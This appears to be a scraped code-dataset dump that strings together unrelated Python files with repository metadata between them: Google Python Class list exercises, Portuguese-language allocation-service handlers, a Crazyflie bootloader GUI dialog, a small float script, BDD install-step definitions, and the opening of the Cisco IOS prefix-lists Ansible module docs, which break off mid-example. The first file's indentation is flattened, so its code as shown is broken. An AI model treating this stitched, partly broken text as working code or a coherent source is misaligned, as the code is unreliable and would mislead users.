#!/usr/bin/python -tt
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
# Additional basic list exercises
# D. Given a list of numbers, return a list where
# all adjacent == elements have been reduced to a single element,
# so [1, 2, 2, 3] returns [1, 2, 3]. You may create a new list or
# modify the passed in list.
def remove_adjacent(nums):
# +++your code here+++
return
# E. Given two lists sorted in increasing order, create and return a merged
# list of all the elements in sorted order. You may modify the passed in lists.
# Ideally, the solution should work in "linear" time, making a single
# pass of both lists.
def linear_merge(list1, list2):
# +++your code here+++
return
# Note: the solution above is kind of cute, but unfortunately list.pop(0)
# is not constant time with the standard python list implementation, so
# the above is not strictly linear time.
# An alternate approach uses pop(-1) to remove the endmost elements
# from each list, building a solution list which is backwards.
# Then use reversed() to put the result back in the correct order. That
# solution works in linear time, but is more ugly.
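# A minimal sketch of that pop()/reversed() approach (added for illustration only;
# the exercise bodies above are intentionally left blank):
def _linear_merge_popped_sketch(list1, list2):
    result = []
    while list1 and list2:
        # Always pop the larger tail element, building the merged list backwards.
        if list1[-1] >= list2[-1]:
            result.append(list1.pop())
        else:
            result.append(list2.pop())
    # Whatever remains in the non-empty list is already sorted ascending, so
    # append it reversed to keep `result` descending, then flip once at the end.
    result.extend(reversed(list1 or list2))
    result.reverse()
    return result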
# Simple provided test() function used in main() to print
# what each function returns vs. what it's supposed to return.
def test(got, expected):
if got == expected:
prefix = ' OK '
else:
prefix = ' X '
print('{} got: {} expected: {}'.format(prefix, repr(got), repr(expected)))
# Calls the above functions with interesting inputs.
def main():
print('remove_adjacent')
test(remove_adjacent([1, 2, 2, 3]), [1, 2, 3])
test(remove_adjacent([2, 2, 3, 3, 3]), [2, 3])
test(remove_adjacent([]), [])
    print()
print('linear_merge')
test(linear_merge(['aa', 'xx', 'zz'], ['bb', 'cc']),
['aa', 'bb', 'cc', 'xx', 'zz'])
test(linear_merge(['aa', 'xx'], ['bb', 'cc', 'zz']),
['aa', 'bb', 'cc', 'xx', 'zz'])
test(linear_merge(['aa', 'aa'], ['aa', 'bb', 'bb']),
['aa', 'aa', 'aa', 'bb', 'bb'])
if __name__ == '__main__':
main()
| 32.833333
| 79
| 0.661744
|
77f367240ea2a8296d77b53becca5edffe47db13
| 3,177
|
py
|
Python
|
src/alocacao/camada_servicos/handlers.py
|
ralphribeiro/APWP-T2
|
1ed5552a32ae9320eadbbd0489c2082a6f8750a8
|
[
"MIT"
] | null | null | null |
src/alocacao/camada_servicos/handlers.py
|
ralphribeiro/APWP-T2
|
1ed5552a32ae9320eadbbd0489c2082a6f8750a8
|
[
"MIT"
] | null | null | null |
src/alocacao/camada_servicos/handlers.py
|
ralphribeiro/APWP-T2
|
1ed5552a32ae9320eadbbd0489c2082a6f8750a8
|
[
"MIT"
] | null | null | null |
from dataclasses import asdict
from alocacao.adapters import notifications
from alocacao.aplicacao import redis_eventpublisher
from alocacao.camada_servicos import unit_of_work
from alocacao.dominio import modelo, eventos, comandos
class SkuInvalido(Exception):
...
def adiciona_lote(
comando: comandos.CriarLote,
uow: unit_of_work.AbstractUOW
):
with uow:
produto = uow.produtos.get(sku=comando.sku)
if produto is None:
produto = modelo.Produto(comando.sku, lotes=[])
uow.produtos.add(produto)
produto.lotes.append(modelo.Lote(
comando.ref, comando.sku, comando.qtd, comando.eta
))
uow.commit()
def alocar(
comando: comandos.Alocar,
uow: unit_of_work.AbstractUOW
) -> str:
linha = modelo.LinhaPedido(comando.pedido_id, comando.sku, comando.qtd)
with uow:
produto = uow.produtos.get(sku=comando.sku)
if produto is None:
raise SkuInvalido(f'Sku inválido {comando.sku}')
ref_lote = produto.alocar(linha)
uow.commit()
return ref_lote
def realocar(
evento: eventos.Desalocado,
uow: unit_of_work.SQLAlchemyUOW
):
with uow:
produto = uow.produtos.get(sku=evento.sku)
produto.eventos.append(comandos.Alocar(**asdict(evento)))
uow.commit()
def altera_qtd_lote(
comando: comandos.AlterarQuantidadeLote,
uow: unit_of_work.AbstractUOW
):
with uow:
produto = uow.produtos.get_by_ref(comando.ref)
produto.altera_qtd_lote(comando.ref, comando.qtd_nova)
uow.commit()
def envia_notificacao_sem_estoque(
evento: eventos.SemEstoque,
notifications: notifications.AbstractNotifications
):
notifications.send(
'estoque@apwp-t2.com',
f'Fora de estoque para {evento.sku}'
)
def publica_evento_alocado(
evento: eventos.Alocado
):
redis_eventpublisher.publish('linha_alocada', evento)
def adiciona_alocacao_ao_modelo_de_leitura(
evento: eventos.Alocado,
uow: unit_of_work.SQLAlchemyUOW
):
with uow:
uow.session.execute(
'INSERT INTO alocacoes_view (pedido_id, sku, ref_lote) '
'VALUES (:pedido_id, :sku, :ref_lote)',
dict(
pedido_id=evento.pedido_id,
sku=evento.sku,
ref_lote=evento.ref_lote
)
)
uow.commit()
def remove_alocacao_do_modelo_de_leitura(
evento: eventos.Desalocado,
uow: unit_of_work.SQLAlchemyUOW
):
with uow:
uow.session.execute(
'DELETE FROM alocacoes_view '
'WHERE pedido_id=:pedido_id AND sku=:sku',
dict(pedido_id=evento.pedido_id, sku=evento.sku)
)
uow.commit()
EVENT_HANDLERS = {
eventos.SemEstoque: [envia_notificacao_sem_estoque],
eventos.Alocado: [
publica_evento_alocado,
adiciona_alocacao_ao_modelo_de_leitura
],
eventos.Desalocado: [
remove_alocacao_do_modelo_de_leitura,
realocar
],
}
COMMAND_HANDLERS = {
comandos.CriarLote: adiciona_lote,
comandos.Alocar: alocar,
comandos.AlterarQuantidadeLote: altera_qtd_lote
}
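# --- illustrative dispatch sketch (added for clarity; not part of this module) ---
# A hypothetical message bus would look these maps up by message type: a command
# maps to exactly one handler, while an event may fan out to several. Injection of
# the extra dependencies some handlers need (notifications, the event publisher)
# is glossed over here.
#
#     def handle(message, uow):
#         if type(message) in COMMAND_HANDLERS:
#             COMMAND_HANDLERS[type(message)](message, uow)
#         else:
#             for handler in EVENT_HANDLERS[type(message)]:
#                 handler(message, uow)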
| 25.416
| 75
| 0.665093
|
3fffdd15f4afb89a483e022651a57857f3527241
| 9,882
|
py
|
Python
|
crazyflie-clients-python/src/cfclient/ui/dialogs/bootloader.py
|
manikamakam/swarm
|
3d3f4692f1969e0973fa8929660a8d0da53cafa7
|
[
"MIT"
] | null | null | null |
crazyflie-clients-python/src/cfclient/ui/dialogs/bootloader.py
|
manikamakam/swarm
|
3d3f4692f1969e0973fa8929660a8d0da53cafa7
|
[
"MIT"
] | null | null | null |
crazyflie-clients-python/src/cfclient/ui/dialogs/bootloader.py
|
manikamakam/swarm
|
3d3f4692f1969e0973fa8929660a8d0da53cafa7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# || ____ _ __
# +------+ / __ )(_) /_______________ _____ ___
# | 0xBC | / __ / / __/ ___/ ___/ __ `/_ / / _ \
# +------+ / /_/ / / /_/ /__/ / / /_/ / / /_/ __/
# || || /_____/_/\__/\___/_/ \__,_/ /___/\___/
#
# Copyright (C) 2011-2013 Bitcraze AB
#
# Crazyflie Nano Quadcopter Client
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
The bootloader dialog is used to update the Crazyflie firmware and to
read/write the configuration block in the Crazyflie flash.
"""
from cflib.bootloader import Bootloader
import logging
from PyQt5 import QtWidgets, uic
from PyQt5.QtCore import pyqtSlot, pyqtSignal, QThread
import cfclient
__author__ = 'Bitcraze AB'
__all__ = ['BootloaderDialog']
logger = logging.getLogger(__name__)
service_dialog_class = uic.loadUiType(cfclient.module_path +
"/ui/dialogs/bootloader.ui")[0]
class UIState:
DISCONNECTED = 0
CONNECTING = 5
CONNECT_FAILED = 1
COLD_CONNECT = 2
FLASHING = 3
RESET = 4
class BootloaderDialog(QtWidgets.QWidget, service_dialog_class):
"""Tab for update the Crazyflie firmware and for reading/writing the config
block in flash"""
def __init__(self, helper, *args):
super(BootloaderDialog, self).__init__(*args)
self.setupUi(self)
self.tabName = "Service"
self.menuName = "Service"
# self.tabWidget = tabWidget
self.helper = helper
# self.cf = crazyflie
self.clt = CrazyloadThread()
# Connecting GUI signals (a pity to do that manually...)
self.imagePathBrowseButton.clicked.connect(self.pathBrowse)
self.programButton.clicked.connect(self.programAction)
self.verifyButton.clicked.connect(self.verifyAction)
self.coldBootButton.clicked.connect(self.initiateColdboot)
self.resetButton.clicked.connect(self.resetCopter)
self._cancel_bootloading.clicked.connect(self.close)
# connecting other signals
self.clt.programmed.connect(self.programDone)
self.clt.verified.connect(self.verifyDone)
self.clt.statusChanged.connect(self.statusUpdate)
# self.clt.updateBootloaderStatusSignal.connect(
# self.updateBootloaderStatus)
self.clt.connectingSignal.connect(
lambda: self.setUiState(UIState.CONNECTING))
self.clt.connectedSignal.connect(
lambda: self.setUiState(UIState.COLD_CONNECT))
self.clt.failed_signal.connect(lambda m: self._ui_connection_fail(m))
self.clt.disconnectedSignal.connect(
lambda: self.setUiState(UIState.DISCONNECTED))
self.clt.start()
def _ui_connection_fail(self, message):
self.setStatusLabel(message)
self.coldBootButton.setEnabled(True)
def setUiState(self, state):
if (state == UIState.DISCONNECTED):
self.resetButton.setEnabled(False)
self.programButton.setEnabled(False)
self.setStatusLabel("Not connected")
self.coldBootButton.setEnabled(True)
self.progressBar.setTextVisible(False)
self.progressBar.setValue(0)
self.statusLabel.setText('Status: <b>IDLE</b>')
self.imagePathLine.setText("")
elif (state == UIState.CONNECTING):
self.resetButton.setEnabled(False)
self.programButton.setEnabled(False)
self.setStatusLabel("Trying to connect cold bootloader, restart "
"the Crazyflie to connect")
self.coldBootButton.setEnabled(False)
elif (state == UIState.CONNECT_FAILED):
self.setStatusLabel("Connecting to bootloader failed")
self.coldBootButton.setEnabled(True)
elif (state == UIState.COLD_CONNECT):
self.resetButton.setEnabled(True)
self.programButton.setEnabled(True)
self.setStatusLabel("Connected to bootloader")
self.coldBootButton.setEnabled(False)
elif (state == UIState.RESET):
self.setStatusLabel("Resetting to firmware, disconnected")
self.resetButton.setEnabled(False)
self.programButton.setEnabled(False)
self.coldBootButton.setEnabled(False)
self.imagePathLine.setText("")
def setStatusLabel(self, text):
self.connectionStatus.setText("Status: <b>%s</b>" % text)
def connected(self):
self.setUiState(UIState.COLD_CONNECT)
def connectionFailed(self):
self.setUiState(UIState.CONNECT_FAILED)
def resetCopter(self):
self.clt.resetCopterSignal.emit()
self.setUiState(UIState.RESET)
def updateConfig(self, channel, speed, rollTrim, pitchTrim):
self.rollTrim.setValue(rollTrim)
self.pitchTrim.setValue(pitchTrim)
self.radioChannel.setValue(channel)
self.radioSpeed.setCurrentIndex(speed)
def closeEvent(self, event):
self.setUiState(UIState.RESET)
self.clt.resetCopterSignal.emit()
@pyqtSlot()
def pathBrowse(self):
filename = ""
# Fix for crash in X on Ubuntu 14.04
filename, _ = QtWidgets.QFileDialog.getOpenFileName()
if filename != "":
self.imagePathLine.setText(filename)
pass
@pyqtSlot()
def programAction(self):
# self.setStatusLabel("Initiate programming")
self.resetButton.setEnabled(False)
self.programButton.setEnabled(False)
self.imagePathBrowseButton.setEnabled(False)
if self.imagePathLine.text() != "":
self.clt.program.emit(self.imagePathLine.text(),
self.verifyCheckBox.isChecked())
else:
msgBox = QtWidgets.QMessageBox()
msgBox.setText("Please choose an image file to program.")
msgBox.exec_()
@pyqtSlot()
def verifyAction(self):
self.statusLabel.setText('Status: <b>Initiate verification</b>')
pass
@pyqtSlot(bool)
def programDone(self, success):
if success:
            self.statusLabel.setText('Status: <b>Programming complete!</b>')
else:
            self.statusLabel.setText('Status: <b>Programming failed!</b>')
self.resetButton.setEnabled(True)
self.programButton.setEnabled(True)
self.imagePathBrowseButton.setEnabled(True)
@pyqtSlot()
def verifyDone(self):
self.statusLabel.setText('Status: <b>Verification complete</b>')
pass
@pyqtSlot(str, int)
def statusUpdate(self, status, progress):
logger.debug("Status: [%s] | %d", status, progress)
self.statusLabel.setText('Status: <b>' + status + '</b>')
if progress >= 0:
self.progressBar.setValue(progress)
def initiateColdboot(self):
self.clt.initiateColdBootSignal.emit("radio://0/100")
# No run method specified here as the default run implementation is running the
# event loop which is what we want
class CrazyloadThread(QThread):
# Input signals declaration (not sure it should be used like that...)
program = pyqtSignal(str, bool)
verify = pyqtSignal()
initiateColdBootSignal = pyqtSignal(str)
resetCopterSignal = pyqtSignal()
writeConfigSignal = pyqtSignal(int, int, float, float)
# Output signals declaration
programmed = pyqtSignal(bool)
verified = pyqtSignal()
statusChanged = pyqtSignal(str, int)
connectedSignal = pyqtSignal()
connectingSignal = pyqtSignal()
failed_signal = pyqtSignal(str)
disconnectedSignal = pyqtSignal()
updateConfigSignal = pyqtSignal(int, int, float, float)
updateCpuIdSignal = pyqtSignal(str)
radioSpeedPos = 2
def __init__(self):
super(CrazyloadThread, self).__init__()
self._bl = Bootloader()
self._bl.progress_cb = self.statusChanged.emit
# Make sure that the signals are handled by this thread event loop
self.moveToThread(self)
self.program.connect(self.programAction)
self.initiateColdBootSignal.connect(self.initiateColdBoot)
self.resetCopterSignal.connect(self.resetCopter)
def __del__(self):
self.quit()
self.wait()
def initiateColdBoot(self, linkURI):
self.connectingSignal.emit()
try:
success = self._bl.start_bootloader(warm_boot=False)
if not success:
self.failed_signal.emit("Could not connect to bootloader")
else:
self.connectedSignal.emit()
except Exception as e:
self.failed_signal.emit("{}".format(e))
def programAction(self, filename, verify):
targets = {}
if str(filename).endswith("bin"):
targets["stm32"] = ("fw",)
try:
self._bl.flash(str(filename), targets)
self.programmed.emit(True)
except Exception:
self.programmed.emit(False)
def resetCopter(self):
try:
self._bl.reset_to_firmware()
except Exception:
pass
self._bl.close()
self.disconnectedSignal.emit()
| 35.042553
| 79
| 0.646934
|
8a1af016c186610e90c65276ce4189d4c966f42d
| 286
|
py
|
Python
|
ex016.py
|
thaisouza30/Exercicios-Python3-Curso-em-Video
|
ec9ccf57fae7bd86ec7a80efb1df779dd2128154
|
[
"Apache-2.0"
] | 1
|
2021-02-01T17:22:11.000Z
|
2021-02-01T17:22:11.000Z
|
ex016.py
|
thaisouza30/Exercicios-Python3-Curso-em-Video
|
ec9ccf57fae7bd86ec7a80efb1df779dd2128154
|
[
"Apache-2.0"
] | null | null | null |
ex016.py
|
thaisouza30/Exercicios-Python3-Curso-em-Video
|
ec9ccf57fae7bd86ec7a80efb1df779dd2128154
|
[
"Apache-2.0"
] | null | null | null |
'''from math import trunc
num = float(input('Digite um número'))
print('O valor digitado foi {} e sua porção inteira é {}'.format(num, trunc(num)))'''
num = float(input('Digite um valor:'))
print('O valor digitado foi {} e a sua porção inteira é {}'.format(num, int(num)))
| 28.6
| 86
| 0.646853
|
344ae179c251286e00d5eaaf7d6127ca538a7817
| 1,914
|
py
|
Python
|
test/acceptance/e2e/install_product/steps.py
|
flopezag/fiware-sdc
|
44bacb77f252276fbf4ba5260218a1883319508f
|
[
"Apache-2.0"
] | null | null | null |
test/acceptance/e2e/install_product/steps.py
|
flopezag/fiware-sdc
|
44bacb77f252276fbf4ba5260218a1883319508f
|
[
"Apache-2.0"
] | null | null | null |
test/acceptance/e2e/install_product/steps.py
|
flopezag/fiware-sdc
|
44bacb77f252276fbf4ba5260218a1883319508f
|
[
"Apache-2.0"
] | null | null | null |
__author__ = 'jfernandez'
"""
Imports all steps already defined and implemented in 'install_product' feature
"""
from component.install_product.features.install_product import *
from commons.utils import wait_for_software_installed, generate_content_installed_by_product
from commons.fabric_utils import execute_content_in_file
@step(u'a installed product with name "([^"]*)" and release "([^"]*)"')
def installed_product(step, product_name, product_version):
a_created_product_with_name_group1(step, product_name, product_version)
i_install_the_product_in_the_vm(step)
the_task_is_performed(step)
@step(u'the task is performed')
def the_task_is_performed(step):
the_task_has_finished_with_status_group1(step, TASK_STATUS_VALUE_SUCCESS)
@step(u'the product is installed')
def the_product_is_installed(step):
world.file_name = PRODUCT_FILE_NAME_FORMAT.format(product_name=world.product_name,
product_version=world.product_version,
installator=world.cm_tool)
assert_true(wait_for_software_installed(status_to_be_finished=True, file_name=world.file_name),
"ERROR: SOFTWARE IS NOT INSTALLED")
@step(u'the product with attributes is installed')
def the_product_with_attributes_is_installed(step):
the_product_is_installed(step)
for attribute in world.instance_attributes:
assert_true(execute_content_in_file(world.file_name,
generate_content_installed_by_product(world.product_name,
world.product_version,
world.instance_attributes)),
"Attribute value not found in product installed [{}]".format(attribute[VALUE]))
| 43.5
| 110
| 0.667712
|
16161b9809017d4aca716bb3ab9f7f5f7e2d53f0
| 32,807
|
py
|
Python
|
venv/lib/python3.6/site-packages/ansible_collections/cisco/ios/plugins/modules/ios_prefix_lists.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 1
|
2020-01-22T13:11:23.000Z
|
2020-01-22T13:11:23.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/cisco/ios/plugins/modules/ios_prefix_lists.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 12
|
2020-02-21T07:24:52.000Z
|
2020-04-14T09:54:32.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/cisco/ios/plugins/modules/ios_prefix_lists.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2021 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
"""
The module file for cisco.ios_prefix_lists
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
module: ios_prefix_lists
short_description: Prefix Lists resource module
description:
- This module configures and manages the attributes of prefix list on Cisco IOS.
version_added: 2.2.0
author: Sumit Jaiswal (@justjais)
notes:
- Tested against Cisco IOSv Version 15.2 on VIRL
- This module works with connection C(network_cli).
See U(https://docs.ansible.com/ansible/latest/network/user_guide/platform_ios.html)
options:
config:
description: A list of configurations for Prefix lists.
type: list
elements: dict
suboptions:
afi:
description:
- The Address Family Indicator (AFI) for the prefix list.
type: str
choices: ['ipv4', 'ipv6']
prefix_lists:
description: List of Prefix-lists.
type: list
elements: dict
suboptions:
name:
description: Name of a prefix-list
type: str
description:
description: Prefix-list specific description
type: str
entries:
description: Prefix-lists supported params.
type: list
elements: dict
suboptions:
action:
description: Specify packets to be rejected or forwarded
type: str
choices: ['deny', 'permit']
sequence:
description: sequence number of an entry
type: int
description:
description:
- Prefix-list specific description
- Description param at entries level is DEPRECATED
- New Description is introduced at prefix_lists level, please
use the Description param defined at prefix_lists level instead of
Description param at entries level, as at this level description option
will get removed in a future release.
type: str
prefix:
description:
- IPv4 prefix <network>/<length>, e.g., A.B.C.D/nn
- IPv6 prefix <network>/<length>, e.g., X:X:X:X::X/<0-128>
type: str
ge:
description: Minimum prefix length to be matched
type: int
le:
description: Maximum prefix length to be matched
type: int
running_config:
description:
- This option is used only with state I(parsed).
- The value of this option should be the output received from the IOS device by
executing the command B(sh bgp).
- The state I(parsed) reads the configuration from C(running_config) option and
transforms it into Ansible structured data as per the resource module's argspec
and the value is then returned in the I(parsed) key within the result.
type: str
state:
description:
- The state the configuration should be left in
    - The state I(merged) is the default state, which merges the want and have config. However,
      because the IOS platform doesn't allow updating a pre-existing Prefix-List entry, the
      Prefix-Lists resource module will error out in that scenario; with merged state, only
      the addition of a new Prefix-List entry under a new sequence is allowed.
    - The states I(rendered), I(gathered) and I(parsed) do not perform any change
      on the device.
- The state I(rendered) will transform the configuration in C(config) option to
platform specific CLI commands which will be returned in the I(rendered) key
within the result. For state I(rendered) active connection to remote host is
not required.
- The state I(gathered) will fetch the running configuration from device and transform
it into structured data in the format as per the resource module argspec and
the value is returned in the I(gathered) key within the result.
- The state I(parsed) reads the configuration from C(running_config) option and
transforms it into JSON format as per the resource module parameters and the
value is returned in the I(parsed) key within the result. The value of C(running_config)
option should be the same format as the output of command I(sh running-config
| section ^ip prefix-list|^ipv6 prefix-list) executed on device. For state I(parsed) active
connection to remote host is not required.
type: str
choices:
- merged
- replaced
- overridden
- deleted
- gathered
- parsed
- rendered
default: merged
"""
EXAMPLES = """
# Using deleted by Name
# Before state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is test description
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Delete provided Prefix lists config by Prefix name
cisco.ios.ios_prefix_lists:
config:
- afi: ipv4
prefix_lists:
- name: 10
- name: test_prefix
state: deleted
# Commands Fired:
# ---------------
#
# "commands": [
# "no ip prefix-list 10",
# "no ip prefix-list test_prefix"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
# Using deleted by AFI
# Before state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is test description
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Delete provided Prefix lists config by AFI
cisco.ios.ios_prefix_lists:
config:
- afi: ipv4
state: deleted
# Commands Fired:
# ---------------
#
# "commands": [
# "no ip prefix-list test",
# "no ip prefix-list 10",
# "no ip prefix-list test_prefix"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
# Using deleted without any config passed (NOTE: This will delete all Prefix lists configuration from device)
# Before state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is test description
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Delete all Prefix lists config
cisco.ios.ios_prefix_lists:
state: deleted
# Commands Fired:
# ---------------
#
# "commands": [
# "no ip prefix-list test",
# "no ip prefix-list 10",
# "no ip prefix-list test_prefix",
# "no ipv6 prefix-list test_ipv6"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# router-ios#
# Using merged
# Before state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ipv6 prefix-list test_ipv6 description this is ipv6
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Merge provided Prefix lists configuration
cisco.ios.ios_prefix_lists:
config:
- afi: ipv6
prefix_lists:
- name: test_ipv6
description: this is ipv6 merge test
entries:
- action: deny
prefix: 2001:DB8:0:4::/64
ge: 80
le: 100
sequence: 10
state: merged
# After state:
# -------------
#
# Play Execution fails, with error:
# Cannot update existing sequence 10 of Prefix Lists test_ipv6 with state merged.
# Please use state replaced or overridden.
# Before state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ipv6 prefix-list test_ipv6 description this is ipv6
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Merge provided Prefix lists configuration
cisco.ios.ios_prefix_lists:
config:
- afi: ipv4
prefix_lists:
- name: 10
description: this is new merge test
entries:
- action: deny
prefix: 1.0.0.0/8
le: 15
sequence: 5
- action: deny
prefix: 35.0.0.0/8
ge: 10
sequence: 10
- action: deny
prefix: 12.0.0.0/8
ge: 15
sequence: 15
- action: deny
prefix: 14.0.0.0/8
ge: 20
le: 21
sequence: 20
- name: test
description: this is merge test
entries:
- action: deny
prefix: 12.0.0.0/8
ge: 15
sequence: 50
- name: test_prefix
description: this is for prefix-list
entries:
- action: deny
prefix: 35.0.0.0/8
ge: 10
le: 15
sequence: 5
- action: deny
prefix: 35.0.0.0/8
ge: 20
sequence: 10
- afi: ipv6
prefix_lists:
- name: test_ipv6
description: this is ipv6 merge test
entries:
- action: deny
prefix: 2001:DB8:0:4::/64
ge: 80
le: 100
sequence: 20
state: merged
# Commands Fired:
# ---------------
#
# "commands": [
# "ip prefix-list test description this is merge test",
# "ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15",
# "ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15",
# "ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10",
# "ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15",
# "ip prefix-list 10 description this is new merge test",
# "ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21",
# "ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20",
# "ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15",
# "ip prefix-list test_prefix description this is for prefix-list",
# "ipv6 prefix-list test_ipv6 seq 20 deny 2001:DB8:0:4::/64 ge 80 le 100",
# "ipv6 prefix-list test_ipv6 description this is ipv6 merge test"
# ]
# After state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is new merge test
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is merge test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 merge test
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80 le 100
# Using overridden
# Before state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is test description
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Override provided Prefix lists configuration
cisco.ios.ios_prefix_lists:
config:
- afi: ipv4
prefix_lists:
- name: 10
description: this is override test
entries:
- action: deny
prefix: 12.0.0.0/8
ge: 15
sequence: 15
- action: deny
prefix: 14.0.0.0/8
ge: 20
le: 21
sequence: 20
- name: test_override
description: this is override test
entries:
- action: deny
prefix: 35.0.0.0/8
ge: 20
sequence: 10
- afi: ipv6
prefix_lists:
- name: test_ipv6
description: this is ipv6 override test
entries:
- action: deny
prefix: 2001:DB8:0:4::/64
ge: 80
le: 100
sequence: 10
state: overridden
# Commands Fired:
# ---------------
#
